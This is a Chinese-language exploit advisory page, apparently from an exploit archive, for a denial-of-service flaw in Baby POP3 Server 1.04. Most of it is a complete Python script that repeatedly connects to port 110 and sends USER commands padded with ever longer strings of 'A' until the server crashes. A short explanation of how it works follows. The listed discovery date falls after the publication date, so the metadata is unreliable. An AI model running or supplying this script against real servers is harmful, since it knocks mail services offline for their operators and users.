Baby POP3服务器1.04版拒绝服务漏洞分析与利用代码

本文详细分析了Baby POP3 Server 1.04版本存在的拒绝服务漏洞,提供了完整的Python利用代码,通过发送特制USER命令导致服务器崩溃,影响Windows XP和Windows 7系统。

DOS Baby POP3 Server 1.04

发布日期: 2025.08.28
提交者: Érick Sousa
风险等级: 中等
本地利用: 否
远程利用: 是
CVE: N/A
CWE: N/A

漏洞信息

漏洞标题: DOS Baby POP3 Server 1.04
发现日期: 2025年12月8日
漏洞作者: Érick Sousa (https://www.linkedin.com/in/erickssa)
厂商主页: https://www.pablosoftwaresolutions.com
软件链接: https://www.pablosoftwaresolutions.com/html/baby_pop3_server.html
影响版本: Baby POP3 Server Version 1.04
测试平台: Windows XP 和 Windows 7

利用代码

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
# Python 3.13.5 ;)
import socket

jkcode = b"A"
counter = 0

while counter < 10000:
    counter += 10
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect(("192.168.18.240", 110))
    s.send(b"USER " + jkcode * counter + b"\r\n")
    s.close()

技术说明

该漏洞利用代码通过向Baby POP3服务器的110端口发送特制的USER命令,其中包含逐渐增多的"A"字符填充,最终导致目标服务器发生拒绝服务条件。代码使用Python的socket库建立TCP连接,循环发送恶意载荷直到计数器达到10000。

comments powered by Disqus
使用 Hugo 构建
主题 StackJimmy 设计